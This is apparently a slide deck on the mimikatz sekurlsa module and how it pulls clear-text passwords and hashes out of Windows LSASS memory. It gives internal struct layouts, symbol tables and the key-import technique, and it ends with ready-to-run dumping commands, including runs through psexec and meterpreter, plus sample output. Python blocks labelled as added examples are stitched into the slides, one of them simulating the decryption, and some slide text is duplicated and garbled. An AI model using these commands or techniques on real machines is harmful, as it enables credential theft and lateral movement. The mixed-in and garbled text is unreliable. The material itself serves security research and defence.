[Diagram (PLAYSKOOL level): WinLogon passes user / domain / password to LSASS; LSASS hands them to its authentication packages (msv1_0, tspkg, wdigest, livessp, kerberos); authentication is done by msv1_0 (against the SAM) or kerberos, using challenge / response.]
mimikatz :: sekurlsa: how LSA works ( level)
Authentication packages
– take the user's credentials from the logon
– do their own stuff
– keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get this data and inject it in another LSASS session, we avoid the authentication part.
This is the principle of « Pass-the-hash »
– In fact, of « Pass-the-x »
mimikatz :: sekurlsa: history of « pass-the-* » 1/2
Pass-the-hash
– 1997 - Unix: modified SAMBA client for hashes usage, Paul Ashton (EIGEN)
– 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
– 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
– 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash
Pass-the-ticket
– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa: history of « pass-the-* » 2/2
Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
– begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again… more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes a hash is not enough…
mimikatz :: sekurlsa :: tspkg: what is it?
Microsoft introduced SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users' experience
– http://technet.microsoft.com/library/cc772108.aspx
It relies on CredSSP with Credentials Delegation (= Account delegation)
– Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
– The user does not have to type their password
– The password is not in the RDP file
– The password is not in user secrets
mimikatz :: sekurlsa :: tspkg: questions
The KB says that for it to work we must enable « Default credentials » delegation
– “Default credentials: The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
• What? Our User/Domain/Password | Hash | Ticket? It seems…
– In all cases the system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN)
  TSPasswordCreds ::= SEQUENCE {
      domainName [0] OCTET STRING,
      userName   [1] OCTET STRING,
      password   [2] OCTET STRING
  }
– Challenge / response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, the password is sent to the server…
So the password resides somewhere in memory
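The TSPasswordCreds structure quoted above, encoded and decoded by hand as an added example (this is not code from the slides or from mimikatz). It assumes the [MS-CSSP] encoding: DER, each field an EXPLICIT context tag [0]/[1]/[2] wrapping an OCTET STRING that holds the UTF-16LE string; the sample credentials are constructed. Decoding the blob back into its three strings shows the slide's point: what the client delegates is the password itself, not a hash or a proof of possession, so the server side receives it in clear and the client has to hold it in memory to produce it.

```python
# Added example (not code from the slides or from mimikatz): hand-rolled DER
# encoder/decoder for the TSPasswordCreds SEQUENCE of [MS-CSSP].
# Assumed encoding: DER, EXPLICIT context tags [0]..[2], each wrapping an
# OCTET STRING that carries the UTF-16LE string.

_FIELDS = ("domainName", "userName", "password")


def _der_length(n: int) -> bytes:
    """DER definite length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    """One tag / length / value triplet."""
    return bytes([tag]) + _der_length(len(body)) + body


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """TSPasswordCreds ::= SEQUENCE { domainName [0], userName [1], password [2] } (OCTET STRINGs)."""
    fields = b""
    for index, value in enumerate((domain, user, password)):
        octet_string = _tlv(0x04, value.encode("utf-16-le"))
        fields += _tlv(0xA0 | index, octet_string)  # [index] EXPLICIT, constructed
    return _tlv(0x30, fields)


def _read_tlv(buf: bytes, pos: int):
    """Read one TLV at pos; return (tag, value, next_pos). Raises ValueError on truncation."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated value")
    return tag, value, pos + length


def decode_ts_password_creds(blob: bytes) -> dict:
    """Parse a TSPasswordCreds blob back into its three strings.

    Every structural assumption is checked, so malformed input raises
    ValueError instead of yielding a partially filled result.
    """
    tag, seq, end = _read_tlv(blob, 0)
    if tag != 0x30 or end != len(blob):
        raise ValueError("not a single SEQUENCE")
    out = {}
    pos = 0
    while pos < len(seq):
        tag, body, pos = _read_tlv(seq, pos)
        index = tag & 0x1F
        if (tag & 0xE0) != 0xA0 or index >= len(_FIELDS) or _FIELDS[index] in out:
            raise ValueError("unexpected or repeated context tag 0x%02x" % tag)
        inner_tag, octets, inner_end = _read_tlv(body, 0)
        if inner_tag != 0x04 or inner_end != len(body):
            raise ValueError("field is not exactly one OCTET STRING")
        out[_FIELDS[index]] = octets.decode("utf-16-le")
    if len(out) != len(_FIELDS):
        raise ValueError("missing field(s)")
    return out


if __name__ == "__main__":
    # constructed sample credentials, not real ones
    blob = encode_ts_password_creds("CONTOSO", "alice", "S3cret!")
    print(blob.hex())
    print(decode_ts_password_creds(blob))  # the password comes back in clear
```

The decoder is deliberately strict (single outer SEQUENCE, tags in the expected class, no repeated or missing fields) because a parser that sits on the server side of CredSSP is fed by the network; the empty-string encoding 30 0c a0 02 04 00 a1 02 04 00 a2 02 04 00 is a handy fixed reference when checking an implementation against the spec.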
mimikatz :: sekurlsa :: tspkg: symbols & theory
Let's explore some symbols
– sounds cool… (thanks Microsoft)
Let's imagine a scenario
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials…
kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg: workflow
[Workflow diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → pTsPrimary → LsaUnprotectMemory → KIWI_TS_PRIMARY_CREDENTIAL → password in clear]

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg: demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because a clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest: what is it?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]” Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP” Microsoft: http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon
The WDigest provider must have the elements to compute responses for different servers
– Username
– Realm (from the server)
– Password
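The HA1 / HA2 / response formulas above, carried through in Python as an added example (not code from the slides). It uses the RFC 2617 test vector (user Mufasa, realm testrealm@host.com, password "Circle Of Life") with the qop=auth form of the response, and the legacy MD5(HA1:nonce:HA2) form when no qop is given; ha1_per_realm shows why the slide says the realm matters: the same password gives a different HA1 for every realm, so a client that does not yet know which realm a server will announce cannot keep a single HA1 and has to keep the password itself (or one HA1 per realm it has already seen).

```python
import hashlib


def _md5_hex(text: str) -> str:
    """MD5 hex digest of a string, as RFC 2617 specifies (MD5 is what the protocol uses)."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password): depends on the realm announced by the server."""
    return _md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (no entity-body hash)."""
    return _md5_hex(f"{method}:{digest_uri}")


def digest_response(username, realm, password, nonce, method, digest_uri,
                    nc=None, cnonce=None, qop=None):
    """Client response: MD5(HA1:nonce:[nc:cnonce:qop:]HA2).

    With qop present (RFC 2617) the nonce count and client nonce are mixed in;
    without qop the legacy RFC 2069 form MD5(HA1:nonce:HA2) is used.
    """
    h1 = ha1(username, realm, password)
    h2 = ha2(method, digest_uri)
    if qop:
        return _md5_hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")
    return _md5_hex(f"{h1}:{nonce}:{h2}")


def ha1_per_realm(username: str, password: str, realms):
    """One HA1 per realm: the value a server may store instead of the password is
    only usable for that realm, and a client cannot precompute it before it
    learns the realm from the server's challenge."""
    return {realm: ha1(username, realm, password) for realm in realms}


if __name__ == "__main__":
    # RFC 2617 section 3.5 example values
    print(digest_response("Mufasa", "testrealm@host.com", "Circle Of Life",
                          "dcd98b7102dd2f0e8b11d0f600bfb0c093", "GET", "/dir/index.html",
                          nc="00000001", cnonce="0a4f113b", qop="auth"))
    # constructed realms: same user and password, a different HA1 each time
    for realm, h in ha1_per_realm("alice", "S3cret!", ["corp.example", "mail.example"]).items():
        print(realm, h)
```

The RFC vector gives HA1 939e7578ed9e3c518a452acee763bce9, HA2 39aff3a2bab6126f332b942af96d3366 and response 6629fae49393a05397450978507c4ef1, which is a quick way to check any Digest implementation before trusting it.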
mimikatz :: sekurlsa :: wdigest: theory
This time we know
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the double linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8          call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest: workflow
[Workflow diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp: how?
Actually, I've only used a logical (empirical) approach to search passwords…
– Protocol reading
– Symbols searching
~ Boring ~… be more brutal this time: make a WinDBG trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp: how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Our LiveSSP provider
Yeah, Pass the Hash capability with Live accounts too…
A Live user can logon through RDP via SSO
mimikatz :: sekurlsa :: livessp: workflow
[Workflow diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
Call stacks reaching lsasrv!LsaProtectMemory (innermost frame first):
- lsasrv!LsaProtectMemory <- kerberos!KerbHideKey <- kerberos!KerbCreatePrimaryCredentials <- kerberos!KerbCreateLogonSession <- kerberos!SpAcceptCredentials (Kerberos ticket part? Maybe ;))
- lsasrv!LsaProtectMemory <- kerberos!KerbHidePassword <- kerberos!KerbCreateLogonSession <- kerberos!SpAcceptCredentials (Kerberos part for the password)
- lsasrv!LsaProtectMemory <- msv1_0!NlpAddPrimaryCredential <- msv1_0!SspAcceptCredentials <- msv1_0!SpAcceptCredentials
- lsasrv!LsaProtectMemory <- wdigest!SpAcceptCredentials
- lsasrv!LsaProtectMemory <- tspkg!TSHidePassword <- tspkg!SpAcceptCredentials
mimikatz sekurlsa: kerberos (nt6) workflow

[workflow diagram] LsaEnumerateLogonSessions -> for each LUID: RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory on Password -> password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
	DWORD unk0;
	PVOID unk1;
	PVOID unk2;
	PVOID unk3;
#ifdef _M_X64
	BYTE unk4[32];
#elif defined _M_IX86
	BYTE unk4[20];
#endif
	LUID LocallyUniqueIdentifier;
#ifdef _M_X64
	BYTE unk5[44];
#elif defined _M_IX86
	BYTE unk5[36];
#endif
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa: kerberos (nt5) workflow

[workflow diagram] LsaEnumerateLogonSessions -> for each LUID: search the linked list kerberos!KerbLogonSessionList for the KIWI_KERBEROS_LOGON_SESSION with that LUID -> LsaUnprotectMemory on Password -> password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
	struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
	struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
	DWORD UsageCount;
	PVOID unk0;
	PVOID unk1;
	PVOID unk2;
	DWORD unk3;
	DWORD unk4;
	PVOID unk5;
	PVOID unk6;
	PVOID unk7;
	LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
	DWORD unk8;
#endif
	DWORD unk9;
	DWORD unk10;
	PVOID unk11;
	DWORD unk12;
	DWORD unk13;
	PVOID unk14;
	PVOID unk15;
	PVOID unk16;
	/* […] */
	LSA_UNICODE_STRING UserName;
	LSA_UNICODE_STRING Domaine;
	LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz sekurlsa: demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz sekurlsa: kerberos "hu?"

Ok, it works…
But why?
- Not at logon at all on NT5 (can need an unlock)
From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol…
- all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
- For password auth:
  • the password hash is the shared secret, but the password is kept in memory
- For full smartcard auth:
  • No password on the client
  • No hash on the client
  - NTLM hash on the client anyway…
  - the KDC sent it back as a gift
mimikatz sekurlsa

All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.
Can it be fun to decrypt outside the process?
- Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too, and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS
mimikatz sekurlsa: LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESx

[diagram] Key material lives in lsasrv.dll globals inside lsass; mimikatz loads its own copy of lsasrv.dll and copies these globals out of the LSASS process:
- g_cbRandomKey: DWORD (256)
- g_pRandomKey: pointer to BYTE[g_cbRandomKey]
- g_pDESXKey: pointer to BYTE[144]
- g_Feedback: BYTE[8]
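The following is an added example, not mimikatz code, that models the three ideas above in one place: the per-LUID walk of a logon-session list (as for livessp and NT5 kerberos), the LSA_UNICODE_STRING fields whose Buffer holds a password protected in place by LsaProtectMemory, and the "import the keys" trick: once the lsasrv globals (g_cbRandomKey / g_pRandomKey) are read out of LSASS memory, every password decrypts without any injection. The "memory image" is constructed here with a 32-bit layout; the entry layout is a simplified stand-in for the KIWI_* structs, only the NT5 RC4 case is modelled (the size rule that picks RC4 or DESx, and the NT6 3DES/AES path, are not), and the key, LUIDs and credentials are sample values.

```python
"""
Added example (not from mimikatz): sekurlsa-style decryption of LSASS secrets
from outside the process, on a constructed 32-bit "memory image".
Simplified entry layout (not the real KIWI_* struct):
  +0 Flink  +4 Blink  +8 LUID (8 bytes)
  +16 UserName (LSA_UNICODE_STRING, 8 bytes)  +24 Password (LSA_UNICODE_STRING)
"""
import struct

BASE = 0x01000000      # virtual address of the image's first byte (constructed)
ENTRY_SIZE = 32
OFF_LUID, OFF_USER, OFF_PASS = 8, 16, 24


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: the NT5 stream-cipher case; protect and unprotect are the same op."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_image(key: bytes, sessions):
    """The 'LSASS side': key globals, list head, entries and string buffers,
    with every Password buffer already protected in place."""
    img = bytearray()

    def alloc(data: bytes) -> int:
        addr = BASE + len(img)
        img.extend(data)
        return addr

    sym = {}
    sym["g_cbRandomKey"] = alloc(struct.pack("<I", len(key)))   # DWORD
    key_addr = alloc(key)                                         # BYTE[g_cbRandomKey]
    sym["g_pRandomKey"] = alloc(struct.pack("<I", key_addr))     # pointer to the key
    sym["head"] = alloc(b"\0" * (8 + ENTRY_SIZE * len(sessions)))
    entries = [sym["head"] + 8 + n * ENTRY_SIZE for n in range(len(sessions))]
    ring = [sym["head"]] + entries                                # circular doubly linked list
    for n, addr in enumerate(ring):
        flink, blink = ring[(n + 1) % len(ring)], ring[(n - 1) % len(ring)]
        struct.pack_into("<II", img, addr - BASE, flink, blink)
    for addr, (luid, user, password) in zip(entries, sessions):
        user_buf = user.encode("utf-16le")
        pass_buf = rc4(key, password.encode("utf-16le"))          # what LsaProtectMemory leaves
        user_ptr, pass_ptr = alloc(user_buf), alloc(pass_buf)
        struct.pack_into("<Q", img, addr - BASE + OFF_LUID, luid)
        struct.pack_into("<HHI", img, addr - BASE + OFF_USER, len(user_buf), len(user_buf), user_ptr)
        struct.pack_into("<HHI", img, addr - BASE + OFF_PASS, len(pass_buf), len(pass_buf), pass_ptr)
    return bytes(img), sym


def read(img: bytes, va: int, size: int) -> bytes:
    return img[va - BASE: va - BASE + size]


def read_u32(img: bytes, va: int) -> int:
    return struct.unpack("<I", read(img, va, 4))[0]


def read_lsa_unicode_string(img: bytes, va: int) -> bytes:
    """LSA_UNICODE_STRING on x86: USHORT Length, USHORT MaximumLength, PWSTR Buffer."""
    length, _maximum, buffer = struct.unpack("<HHI", read(img, va, 8))
    return read(img, buffer, length)


def import_keys(img: bytes, sym: dict) -> bytes:
    """Instead of injecting: copy lsasrv's key globals out of the LSASS image."""
    return read(img, read_u32(img, sym["g_pRandomKey"]), read_u32(img, sym["g_cbRandomKey"]))


def find_session(img: bytes, head: int, luid: int):
    """Walk the circular list from its head until the entry with this LUID, or back to head."""
    cur = read_u32(img, head)                       # head.Flink
    while cur != head:
        if struct.unpack("<Q", read(img, cur + OFF_LUID, 8))[0] == luid:
            return cur
        cur = read_u32(img, cur)                    # entry.Flink
    return None


def logon_password(img: bytes, sym: dict, luid: int):
    """One sekurlsa step: locate the LUID's entry, unprotect its Password with the imported key."""
    entry = find_session(img, sym["head"], luid)
    if entry is None:
        return None
    key = import_keys(img, sym)
    user = read_lsa_unicode_string(img, entry + OFF_USER).decode("utf-16le")
    password = rc4(key, read_lsa_unicode_string(img, entry + OFF_PASS)).decode("utf-16le")
    return user, password


# constructed sample; in a real LSASS the key is random and LUIDs come from LsaEnumerateLogonSessions
SAMPLE_KEY = bytes(range(0x10, 0x20))
SAMPLE_SESSIONS = [(0x3F5A6, "Gentil Kiwi", "waza1234"), (0x3E7, "LocalService", "svc-pass")]
IMAGE, SYMBOLS = build_image(SAMPLE_KEY, SAMPLE_SESSIONS)

if __name__ == "__main__":
    for luid, _, _ in SAMPLE_SESSIONS:
        print(hex(luid), logon_password(IMAGE, SYMBOLS, luid))
```

The point to take away is in import_keys: nothing about the protection depends on being inside LSASS, only on reading two globals and a buffer, which any process with SeDebugPrivilege can do.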
mimikatz sekurlsa: LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES

[diagram] Key material lives in lsasrv.dll globals inside lsass; mimikatz copies these globals (and the key data they point to) out of the LSASS process:
- InitializationVector: BYTE[16]
- h3DesKey: pointer to KIWI_BCRYPT_KEY
- hAesKey: pointer to KIWI_BCRYPT_KEY

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz sekurlsa: memo

Security Packages
Package         | Symbols                                                | Type
tspkg           | tspkg!TSGlobalCredTable                                | RTL_AVL_TABLE
wdigest         | wdigest!l_LogSessList                                  | LIST_ENTRY
livessp         | livessp!LiveGlobalLogonSessionList                     | LIST_ENTRY
kerberos (nt5)  | kerberos!KerbLogonSessionList                          | LIST_ENTRY
kerberos (nt6)  | kerberos!KerbGlobalLogonSessionTable                   | RTL_AVL_TABLE
msv1_0          | lsasrv!LogonSessionList, lsasrv!LogonSessionListCount  | LIST_ENTRY, ULONG

Protection Keys
Key   | NT 5 symbols                               | NT 6 symbols
(IV)  |                                            | lsasrv!InitializationVector
RC4   | lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey  |
DESx  | lsasrv!g_pDESXKey, lsasrv!g_Feedback       |
3DES  |                                            | lsasrv!h3DesKey
AES   |                                            | lsasrv!hAesKey
mimikatz sekurlsa: memo

Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

Sample output (translated from the French build):

mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request for ACTIVATION of privilege: SeDebugPrivilege: OK

mimikatz # sekurlsa::logonPasswords full
Authentication Id: 0;234870
Authentication package: NTLM
Principal user: Gentil Kiwi
Authentication domain: vm-w8-rp-x
	msv1_0:   User: Gentil Kiwi  Domain: vm-w8-rp-x  LM hash: d0e9aee149655a6075e4540af1f22d3b  NTLM hash: cc36cf7a8514893efccd332446158b1a
	kerberos: User: Gentil Kiwi  Domain: vm-w8-rp-x  Password: waza1234
	wdigest:  User: Gentil Kiwi  Domain: vm-w8-rp-x  Password: waza1234
	tspkg:    User: Gentil Kiwi  Domain: vm-w8-rp-x  Password: waza1234
	livessp:  n.t. (LUID KO)
mimikatz sekurlsa: what can we do?

Basics
- No physical access to computers (first step to pass the hash, then pass the pass)
- No admin rights / system rights / debug privileges (…)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless)
- For privileged accounts: network logon instead of interactive (when possible)
- Audit: pass the hash leaves traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
